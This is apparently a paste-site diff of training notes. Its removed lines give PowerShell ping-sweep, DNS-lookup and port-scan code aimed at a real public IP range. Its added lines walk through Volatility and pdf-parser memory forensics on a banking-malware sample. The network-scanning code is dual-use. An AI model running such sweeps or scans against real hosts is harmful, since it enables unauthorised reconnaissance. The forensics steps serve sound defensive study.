1218	-	PowerShell provides several methods for doing Ping
1218	+
1219	-	Test-Connection cmdlet
1219	+
1220	-	Creation of a WMI Object
1220	+
1221	-	.Net System.Net.NetworkInformation.Ping Object
1221	+
1222	-	------------------------------------------------------
1222	+
1223
1224		ForPCAP >>> show
1225	-	------------------------Type This------------------------------
1225	+
1226	-	function New-IPRange ($start, $end) {
1226	+
1227	-	$ip1 = ([System.Net.IPAddress]$start).GetAddressBytes()
1227	+
1228	-	[Array]::Reverse($ip1)
1228	+
1229	-	$ip1 = ([System.Net.IPAddress]($ip1 -join '.')).Address
1229	+
1230
1231	-	$ip2 = ([System.Net.IPAddress]$end).GetAddressBytes()
1231	+
1232	-	[Array]::Reverse($ip2)
1232	+
1233	-	$ip2 = ([System.Net.IPAddress]($ip2 -join '.')).Address
1233	+
1234
1235	-	for ($x=$ip1; $x -le $ip2; $x++) {
1235	+
1236	-	$ip = ([System.Net.IPAddress]$x).GetAddressBytes()
1236	+
1237	-	[Array]::Reverse($ip)
1237	+
1238	-	$ip -join '.'
1238	+
1239	-	}
1239	+
1240	-	}
1240	+
1241	-	$ping = New-Object System.Net.NetworkInformation.Ping
1241	+	# Memory Analysis #
1242	-	New-IPRange 149.28.201.1 149.28.201.250 \| ForEach-Object {$ping.Send($_, 100)} \| where {$_.status -eq "Success"}
1242	+
1243	-	---------------------------------------------------------------
1243	+	cd /home/malware/Desktop/Banking\ Troubles/Volatility
1244
1245		python volatility
1246	-	Reverse Lookups
1246	+	python volatility pslist -f ../hn_forensics.vmem
1247	-	---------------
1247	+	python volatility connscan2 -f ../hn_forensics.vmem
1248	-	For reverse lookups using .Net Class we use the [System.Net.Dns]::GetHostEntry(IP) method Returns System.Net.IPHostEntry
1248	+	python volatility memdmp -p 888 -f ../hn_forensics.vmem
1249		python volatility memdmp -p 1752 -f ../hn_forensics.vmem
1250		*Takes a few min*
1251	-	------Deprecated--------
1251	+	strings 1752.dmp \| grep "^http://" \| sort \| uniq
1252	-	[System.Net.Dns]::GetHostByAddress("162.243.126.247")
1252	+	strings 1752.dmp \| grep "Ahttps://" \| uniq -u
1253	-	------Deprecated--------
1253	+	cd ..
1254		foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
1255	-	Use getnameinfo instead:
1255	+	cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
1256	-	https://msdn.microsoft.com/en-us/library/windows/desktop/ms738532(v=vs.85).aspx
1256	+	cat audit.txt
1257		cd pdf
1258	-	References:
1258	+
1259	-	https://stackoverflow.com/questions/10346194/how-to-use-getnameinfo-instead-of-gethostbyname
1259	+	grep -i javascript *.pdf
1260
1261
1262
1263	-	Forward Lookups
1263	+	cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
1264	-	---------------
1264	+	wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
1265		unzip pdf-parser_V0_6_4.zip
1266	-	------------------------Type This------------------------------
1266	+	python pdf-parser.py -s javascript --raw 00600328.pdf
1267	-	[System.Net.Dns]::GetHostAddresses("www.google.com")
1267	+	python pdf-parser.py --object 11 00600328.pdf
1268	-	---------------------------------------------------------------
1268	+	python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
1269
1270		cat malicious.js
1271	-	Port Scans
1271	+
1272	-	----------
1272	+
1273	-	To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library
1273	+	***Sorry - no time to cover javascript de-obfuscation today***
1274	-	For TCP the .Net System.Net.Sockets.TcpClient
1274	+
1275	-	For UDP the .Net System.Net.Sockets.UdpClient
1275	+
1276		cd /home/malware/Desktop/Banking\ Troubles/Volatility/
1277		python volatility files -f ../hn_forensics.vmem > files
1278		cat files \| less
1279		python volatility malfind -f ../hn_forensics.vmem -d out
1280	-	TCP Scan (Windows 7)
1280	+	ls out/
1281	-	--------------------
1281	+	python volatility hivescan -f ../hn_forensics.vmem
1282	-	NOTE: If you are using Windows 7, use the code below
1282	+	python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
1283	-	------------------------Type This------------------------------
1283	+	for file in $(ls *.dmp); do echo $file; strings $file \| grep bankofamerica; done

Public Pastes

🤑 G2A.com Free Gift Card Guide May 2024 FIX 🎁
GetText | 6 min ago | 0.38 KB
yes ye har!!! snowybot robo manual
JavaScript | 21 min ago | 2.76 KB
127.0.0.1 network linux
JavaScript | 23 min ago | 0.80 KB
🤑 G2A.com Free Gift Card Guide May 2024 FIX 🤑
GetText | 27 min ago | 0.39 KB
Untitled
C++ | 31 min ago | 0.24 KB
Untitled
C++ | 37 min ago | 0.24 KB
Adopt Me Trade Stealer😈
Lua | 44 min ago | 0.06 KB
MatrixMul-OpenCL-CPU
C++ | 48 min ago | 2.53 KB